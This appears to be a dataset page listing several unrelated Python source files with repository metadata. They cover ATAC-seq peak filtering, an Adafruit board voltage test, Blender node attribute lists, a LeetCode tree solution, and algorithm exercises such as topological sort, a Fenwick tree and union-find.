print("The z score is = ",z_score)
z_score = (mean_of_sample3-mean)/std_deviation
print("The z score is = ",z_score) | [
"noreply@github.com"
] | noreply@github.com |
d6447c5e8113bc3dfba69e31df59d4e3c714b954 | 5257652fc34ec87fe45d390ba49b15b238860104 | /single_cell_atacseq_preprocessing/pseudorep_peaks_supported_by_30percent_of_bioreps_in_same_region/get_number_of_samples_that_support_each_regional_peak.py | 47f15d19a533484f6a223eea9579cbdf122b1557 | [] | no_license | thekingofall/alzheimers_parkinsons | cd247fa2520c989e8dd853ed22b58a9bff564391 | 4ceae6ea3eb4c58919ff41aed8803855bca240c8 | refs/heads/master | 2022-11-30T22:36:37.201334 | 2020-08-12T01:23:55 | 2020-08-12T01:23:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,190 | py | #using IDR optimal peaks from the pseudoreplicate set, calculate the number of biological replicates (based on biorep IDR optimal peak sets) that support each peak
import argparse
import pybedtools
import gzip
def parse_args():
    """Build the argument parser for this script and parse sys.argv."""
    parser = argparse.ArgumentParser(
        description="using IDR optimal peaks from the pseudoreplicate set, calculate the number of biological replicates (based on biorep IDR optimal peak sets) that support each peak")
    parser.add_argument(
        "--pseudorep_idr_optimal_peaks",
        help="file containing full paths to the pseudorep IDR peak sets")
    parser.add_argument(
        "--biorep_idr_optimal_peaks",
        help="file containing full paths to the biorep IDR peak sets")
    parser.add_argument(
        "--samples",
        help="file containing list of samples to annotate")
    parser.add_argument(
        "--thresh", default=0.3, type=float,
        help="percent of bioreps for a given condition/region that must contain a peak for it to be included in the finalized set")
    parser.add_argument(
        "--out_suffix", default=".idr.optimal_peaks.support30%.bed.gz",
        help="file suffix for the sample output peak file prefix")
    return parser.parse_args()
def get_sample_to_pseudorep_peak_map(samples, pseudorep_idr_optimal_peaks):
    """Map each sample name to the BedTool for its pseudorep IDR peak file.

    A peak file is assigned to the first sample whose name occurs in its
    path; later samples are not considered for that file.
    """
    sample_to_pseudorep_peaks = {}
    for peak_path in pseudorep_idr_optimal_peaks:
        for sample in samples:
            if sample in peak_path:
                sample_to_pseudorep_peaks[sample] = pybedtools.bedtool.BedTool(peak_path)
                break
    return sample_to_pseudorep_peaks
def get_sample_to_biorep_peak_map(samples, biorep_idr_optimal_peaks):
    """Map each sample name to the list of BedTools for its biorep peak files.

    Matching is done against the path with '/' replaced by '_', so a sample
    name may span directory separators; each file is assigned to the first
    matching sample only.
    """
    sample_to_biorep_peaks = {sample: [] for sample in samples}
    for peak_path in biorep_idr_optimal_peaks:
        flattened = peak_path.replace('/', '_')
        for sample in samples:
            if sample in flattened:
                sample_to_biorep_peaks[sample].append(pybedtools.bedtool.BedTool(peak_path))
                break
    return sample_to_biorep_peaks
def main():
    """Annotate each sample's pseudorep IDR peaks with biorep support.

    For every sample, counts how many biological replicates overlap each
    pseudorep peak (>=40% reciprocal overlap), then writes a supported set
    (peaks seen in >= thresh fraction of bioreps) and an unsupported set,
    each line suffixed with its support count.
    """
    args = parse_args()
    pseudorep_idr_optimal_peaks = open(args.pseudorep_idr_optimal_peaks, 'r').read().strip().split('\n')
    biorep_idr_optimal_peaks = open(args.biorep_idr_optimal_peaks, 'r').read().strip().split('\n')
    samples = open(args.samples, 'r').read().strip().split('\n')
    sample_to_pseudorep_peaks = get_sample_to_pseudorep_peak_map(samples, pseudorep_idr_optimal_peaks)
    sample_to_biorep_peaks = get_sample_to_biorep_peak_map(samples, biorep_idr_optimal_peaks)
    for sample in samples:
        print(sample)
        pseudorep_peaks = sample_to_pseudorep_peaks[sample]
        # (chrom, start, end) -> [number of supporting bioreps, full peak entry]
        support_histogram = {}
        for entry in pseudorep_peaks:
            support_histogram[tuple(entry[0:3])] = [0, entry]
        for biorep_peaks in sample_to_biorep_peaks[sample]:
            # -f/-F 0.4 with -e: keep peaks with >=40% overlap in either
            # direction. Narrowed from a bare except; still best-effort.
            try:
                intersection = pseudorep_peaks.intersect(biorep_peaks, u=True, f=0.4, F=0.4, e=True)
            except Exception:
                print("could not intersect,skipping")
                continue
            intersection = list(set([tuple(i[0:3]) for i in intersection]))
            print(str(len(intersection)) + "/" + str(len(pseudorep_peaks)))
            for intersection_entry in intersection:
                support_histogram[intersection_entry][0] += 1
        outf = gzip.open(sample + args.out_suffix, 'wt')
        outf_bad = gzip.open(sample + ".unsupported" + args.out_suffix, 'wt')
        min_support_count = args.thresh * len(sample_to_biorep_peaks[sample])
        print("min_support_count:" + str(min_support_count))
        out_good = []
        out_bad = []
        for entry in support_histogram:
            cur_entry_support = support_histogram[entry][0]
            line = str(support_histogram[entry][1]).rstrip('\n') + '\t' + str(cur_entry_support)
            if cur_entry_support >= min_support_count:
                out_good.append(line)
            else:
                out_bad.append(line)
        # Terminate both files with a newline (the supported-peaks file
        # originally lacked the trailing newline the unsupported file had).
        outf.write('\n'.join(out_good) + '\n')
        outf_bad.write('\n'.join(out_bad) + '\n')
        outf.close()
        outf_bad.close()


if __name__ == "__main__":
    main()
| [
"annashcherbina@gmail.com"
] | annashcherbina@gmail.com |
3822dc71dbe9d74b56a67f934b2b21851a2d04bd | 19da1a56f137a08772c347cf974be54e9c23c053 | /lib/adafruit_boardtest/boardtest_voltage_monitor.py | bcdd23695e093d6d8bed54eddee6c02a1518167c | [] | no_license | mk53202/mk53202-timeclock-pyportal | d94f45a9d186190a4bc6130077baa6743a816ef3 | 230a858d429f8197c00cab3e67dcfd3b295ffbe0 | refs/heads/master | 2021-02-04T05:38:25.533292 | 2020-02-27T22:45:56 | 2020-02-27T22:45:56 | 243,626,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,216 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 Shawn Hymel for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_boardtest.boardtest_voltage_monitor`
====================================================
Prints out the measured voltage on any onboard voltage/battery monitor pins.
Note that some boards have an onboard voltage divider to decrease the voltage
to these pins.
Run this script as its own main.py to individually run the test, or compile
with mpy-cross and call from separate test script.
* Author(s): Shawn Hymel for Adafruit Industries
Implementation Notes
--------------------
**Hardware:**
* `Multimeter <https://www.adafruit.com/product/2034>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import board
import analogio
__version__ = "1.0.1"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BoardTest.git"
# Constants
VOLTAGE_MONITOR_PIN_NAMES = ['VOLTAGE_MONITOR', 'BATTERY']
ANALOG_REF = 3.3 # Reference analog voltage
ANALOGIN_BITS = 16 # ADC resolution (bits) for CircuitPython
# Test result strings
PASS = "PASS"
FAIL = "FAIL"
NA = "N/A"
def run_test(pins):
    """
    Prints out voltage on the battery monitor or voltage monitor pin.

    :param list[str] pins: list of pins to run the test on
    :return: tuple(str, list[str]): test result followed by list of pins tested
    """
    # Pins whose names mark them as voltage/battery monitors
    monitor_pins = list(set(pins) & set(VOLTAGE_MONITOR_PIN_NAMES))

    # Nothing to test on boards without monitor pins
    if not monitor_pins:
        print("No battery monitor pins found")
        return NA, []

    # Show which monitor pins were found
    print("Voltage monitor pins found:", end=' ')
    for pin in monitor_pins:
        print(pin, end=' ')
    print('\n')

    # Sample and print the voltage on each pin
    for pin in monitor_pins:
        monitor = analogio.AnalogIn(getattr(board, pin))
        voltage = (monitor.value * ANALOG_REF) / (2 ** ANALOGIN_BITS)
        print(pin + ": {:.2f}".format(voltage) + " V")
        monitor.deinit()
    print()

    # Ask the user to confirm the readings
    print("Use a multimeter to verify these voltages.")
    print("Note that some battery monitor pins might have onboard " +
          "voltage dividers.")
    print("Do the values look reasonable? [y/n]")
    if input() == 'y':
        return PASS, monitor_pins
    return FAIL, monitor_pins
def _main():
    # Every attribute exposed by the board module counts as a candidate pin
    pins = list(dir(board))

    # Print the candidate pins
    print()
    print("All pins found:", end=' ')
    for pin in pins:
        print(pin, end=' ')
    print('\n')

    # Run the test and report the outcome
    result, tested_pins = run_test(pins)
    print()
    print(result)
    print("Pins tested: " + str(tested_pins))


# Execute only if run as main.py or code.py
if __name__ == "__main__":
    _main()
| [
"mkoster@stack41.com"
] | mkoster@stack41.com |
faa0ab004c18bd45116e831d5433c6c545aaedb2 | 2f418a0f2fcca40f84ec0863b31ff974b574350c | /scripts/addons_extern/nodes_io/attributes.py | 5763cb541cfaa72d6cdbe4733176fefca15e8fb1 | [] | no_license | JT-a/blenderpython279 | 57a81b55564218f3b1417c2ffa97f5161897ec79 | 04846c82f794c22f87d677d9eb8cec1d05c48cda | refs/heads/master | 2021-06-25T06:58:07.670613 | 2017-09-11T11:14:36 | 2017-09-11T11:14:36 | 103,723,697 | 4 | 2 | null | 2017-09-16T04:09:31 | 2017-09-16T04:09:31 | null | UTF-8 | Python | false | false | 3,621 | py | #!/usr/bin/python3
# --------------------------------------------------
# ATTRIBUTES
# --------------------------------------------------
# Node attributes common to every node type.  Commented-out entries are
# read-only in Blender's API (per the inline notes) or intentionally skipped.
defaults = [
    "bl_idname",
    # "type", # read-only
    "name",
    "label",
    # "parent",
    "select",
    "location",
    # "dimensions", # read-only
    "width",
    "height",
    # "width_hidden",
    "use_custom_color",
    "color",
    "hide",
    "mute",
    "show_options",
    "show_preview",
    "show_texture",
    # "inputs",
    # "outputs",
]
# Node-type-specific attributes.  Each trailing comment lists the node
# `type` values that expose the attribute.
specials = [
    "attribute_name", # ["ATTRIBUTE"]
    "axis", # ["TANGENT"]
    "blend_type", # ["MIX_RGB"]
    "bytecode", # ["SCRIPT"]
    "bytecode_hash", # ["SCRIPT"]
    "color_mapping", # ["TEX_IMAGE", "TEX_ENVIRONMENT", "TEX_NOISE", "TEX_GRADIENT", "TEX_MUSGRAVE", "TEX_MAGIC", "TEX_WAVE", "TEX_SKY", "TEX_VORONOI", "TEX_CHECKER", "TEX_BRICK"]
    "color_ramp", # ["VALTORGB"]
    "color_space", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
    "coloring", # ["TEX_VORONOI"]
    "component", # ["BSDF_HAIR", "BSDF_TOON"]
    "convert_from", # ["VECT_TRANSFORM"]
    "convert_to", # ["VECT_TRANSFORM"]
    "direction_type", # ["TANGENT"]
    "distribution", # ["BSDF_GLOSSY", "BSDF_REFRACTION", "BSDF_ANISOTROPIC", "BSDF_GLASS"]
    "falloff", # ["SUBSURFACE_SCATTERING"]
    "filepath", # ["SCRIPT"]
    "from_dupli", # ["UVMAP", "TEX_COORD"]
    "gradient_type", # ["TEX_GRADIENT"]
    "ground_albedo", # ["TEX_SKY"]
    "image", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
    "interpolation", # ["TEX_IMAGE"]
    "invert", # ["BUMP"]
    "is_active_output", # ["OUTPUT_MATERIAL", "OUTPUT_LAMP"]
    "label_size", # ["FRAME"]
    "mapping", # ["CURVE_RGB", "CURVE_VEC"]
    "max", # ["MAPPING"]
    "min", # ["MAPPING"]
    "mode", # ["SCRIPT"]
    "musgrave_type", # ["TEX_MUSGRAVE"]
    "node_tree", # ["GROUP"]
    "object", # ["TEX_COORD"]
    "offset", # ["TEX_BRICK"]
    "offset_frequency", # ["TEX_BRICK"]
    "operation", # ["VECT_MATH", "MATH"]
    "projection", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
    "projection_blend", # ["TEX_IMAGE"]
    "rotation", # ["MAPPING"]
    "scale", # ["MAPPING"]
    "script", # ["SCRIPT"]
    "shrink", # ["FRAME"]
    "sky_type", # ["TEX_SKY"]
    "space", # ["NORMAL_MAP"]
    "squash", # ["TEX_BRICK"]
    "squash_frequency", # ["TEX_BRICK"]
    "sun_direction", # ["TEX_SKY"]
    "text", # ["FRAME"]
    "texture_mapping", # ["TEX_IMAGE", "TEX_ENVIRONMENT", "TEX_NOISE", "TEX_GRADIENT", "TEX_MUSGRAVE", "TEX_MAGIC", "TEX_WAVE", "TEX_SKY", "TEX_VORONOI", "TEX_CHECKER", "TEX_BRICK"]
    "translation", # ["MAPPING"]
    "turbidity", # ["TEX_SKY"]
    "turbulence_depth", # ["TEX_MAGIC"]
    "use_alpha", # ["MIX_RGB"]
    "use_auto_update", # ["SCRIPT"]
    "use_clamp", # ["MIX_RGB", "MATH"]
    "use_max", # ["MAPPING"]
    "use_min", # ["MAPPING"]
    "use_pixel_size", # ["WIREFRAME"]
    "uv_map", # ["TANGENT", "UVMAP", "NORMAL_MAP"]
    "vector_type", # ["MAPPING", "VECT_TRANSFORM"]
    "wave_type", # ["TEX_WAVE"]
]
# --------------------------------------------------
# INPUTS / OUTPUTS TYPES
# --------------------------------------------------
# Socket types whose default value is vector-like (multi-component).
sock_vectors = [
    "RGBA",
    "VECTOR",
]

# Socket types whose default value is a single scalar/string.
sock_values = [
    "CUSTOM",
    "VALUE",
    "INT",
    "BOOLEAN",
    "STRING",
]
| [
"meta.androcto1@gmail.com"
] | meta.androcto1@gmail.com |
ff55677112a77bdac2fab9a90dd23d2e0ca0ca76 | db33ef7f994d1dc093a7b216b6ba461b7073b42c | /p101.py | 659d635c42eba044ce012a68e5c7fbc380f5ac2c | [] | no_license | whyaza/leetcodepy | cccf911b6179368fb41c509bfe8b5e4ab149ed14 | b1e63fd1d3b83a547ac8dc75058a82668f3ccd7f | refs/heads/master | 2020-03-28T09:16:36.905649 | 2018-09-12T12:54:42 | 2018-09-12T12:54:42 | 148,025,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def isSymmetric(self, root):
        """
        Return True if the binary tree is a mirror of itself around its root.

        The original method body was an empty stub that returned None.

        :type root: TreeNode
        :rtype: bool
        """
        def _mirror(left, right):
            # Two subtrees mirror each other when both are empty, or their
            # roots match and their children cross-match.
            if left is None and right is None:
                return True
            if left is None or right is None:
                return False
            return (left.val == right.val
                    and _mirror(left.left, right.right)
                    and _mirror(left.right, right.left))

        return root is None or _mirror(root.left, root.right)
| [
"645112728@qq.com"
] | 645112728@qq.com |
38836bcb8446dea837411dcda1c0495c5a01f126 | d12b836156b09caa232a230e8b3c021e15853014 | /day-37-plus.py | 2a4ac06d212673a41ea2bfa72be73c415fc63196 | [] | no_license | paperfellaceo/daily-coding-nectar | 3fea28ff3722b76bbe6cf7429508989a14500c74 | d85c371d577b70f04389425082171b9160c1e7b4 | refs/heads/main | 2023-07-27T15:49:30.673042 | 2021-09-11T17:08:25 | 2021-09-11T17:08:25 | 384,548,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,378 | py | from collections import defaultdict, deque
def find_order(course_to_prereqs):
    """Topologically sort courses using Kahn's algorithm.

    `course_to_prereqs` maps course -> iterable of prerequisite courses.
    Returns a valid ordering, or None if the prerequisites contain a cycle.
    """
    # Work on a private mutable copy of the prerequisite sets.
    course_to_prereqs = {c: set(p) for c, p in course_to_prereqs.items()}

    # Courses with no prerequisites can be taken immediately.
    todo = deque([c for c, p in course_to_prereqs.items() if not p])

    # Reverse index: prerequisite -> courses it unlocks.
    # (Fixed: the original bound this dict to a misspelled name,
    # `pareq_to_courses`, so the loop below raised NameError.)
    prereq_to_courses = defaultdict(list)
    for course, prereqs in course_to_prereqs.items():
        for prereq in prereqs:
            prereq_to_courses[prereq].append(course)

    result = []
    while todo:
        prereq = todo.popleft()
        result.append(prereq)
        for c in prereq_to_courses[prereq]:
            course_to_prereqs[c].remove(prereq)
            if not course_to_prereqs[c]:
                todo.append(c)

    # Fewer courses emitted than given means a cycle blocked the rest.
    if len(result) < len(course_to_prereqs):
        return None
    return result
def query(self, index):
    """Return the prefix sum of positions 1..index of a 1-indexed
    Fenwick (binary indexed) tree stored in ``self.tree``.
    """
    total = 0
    while index > 0:
        total += self.tree[index]
        # Strip the lowest set bit to jump to the parent range.
        # (Fixed: the original read `index & =index`, a syntax error,
        # instead of `index & -index`.)
        index -= index & -index
    return total
def update(self, index, value):
    """Add ``value`` at 1-indexed position ``index`` of the Fenwick tree
    stored in ``self.tree``, propagating to every covering range.
    """
    size = len(self.tree)
    while index < size:
        self.tree[index] += value
        # Advance to the next range that covers `index`.
        index += index & -index
class BIT:
    """Binary Indexed (Fenwick) Tree over ``nums``; positions are 1-indexed."""

    def __init__(self, nums):
        # Slot 0 is unused; positions 1..len(nums) hold the tree.
        # (Fixed: the original had mismatched parentheses,
        # `range(len(nums)) + 1)`, which is a syntax error.)
        self.tree = [0 for _ in range(len(nums) + 1)]
        for i, num in enumerate(nums):
            self.update(i + 1, num)

    def update(self, index, value):
        """Add ``value`` at 1-indexed position ``index``.

        (Fixed: the original spelled the parameter ``avlue`` and never
        wrote to the tree, so every query returned 0.)
        """
        while index < len(self.tree):
            self.tree[index] += value
            index += index & -index

    def query(self, index):
        """Return the prefix sum of positions 1..index."""
        total = 0
        while index > 0:
            total += self.tree[index]
            index -= index & -index
        return total
class Subscribers:
    """Track subscriber counts per (0-indexed) hour with range-sum queries."""

    def __init__(self, nums):
        # The BIT stores hour h at tree position h + 1 (1-indexed).
        self.bit = BIT(nums)
        self.nums = nums

    def update(self, hour, value):
        """Set the count for ``hour`` to ``value``."""
        # Feed the delta into the tree at hour + 1 — the BIT is 1-indexed.
        # (Fixed: the original passed `hour`, off by one relative to both
        # BIT.__init__ and query() below.)
        self.bit.update(hour + 1, value - self.nums[hour])
        self.nums[hour] = value

    def query(self, start, end):
        """Total subscribers over the inclusive hour range [start, end]."""
        # (Fixed: the original referenced an undefined name `send` here.)
        return self.bit.query(end + 1) - self.bit.query(start)
class DisjoinSet:
    """Disjoint-set (union-find) with union by size and path shortening."""

    def __init__(self, n):
        self.sets = list(range(n))   # parent pointers; each element starts alone
        self.sizes = [1] * n         # component sizes (meaningful at roots)
        self.count = n               # number of disjoint components

    def union(self, x, y):
        """Merge the components containing x and y (no-op if already joined)."""
        root_x, root_y = self.find(x), self.find(y)
        if root_x == root_y:
            return
        # Attach the smaller component under the larger one.
        if self.sizes[root_x] < self.sizes[root_y]:
            root_x, root_y = root_y, root_x
        self.sets[root_y] = root_x
        self.sizes[root_x] += self.sizes[root_y]
        self.count -= 1

    def find(self, x):
        """Return the root of x's component, shortening x's path to it."""
        root = self.sets[x]
        while root != self.sets[root]:
            root = self.sets[root]
        self.sets[x] = root
        return root
| [
"paperfellaceo@gmail.com"
] | paperfellaceo@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.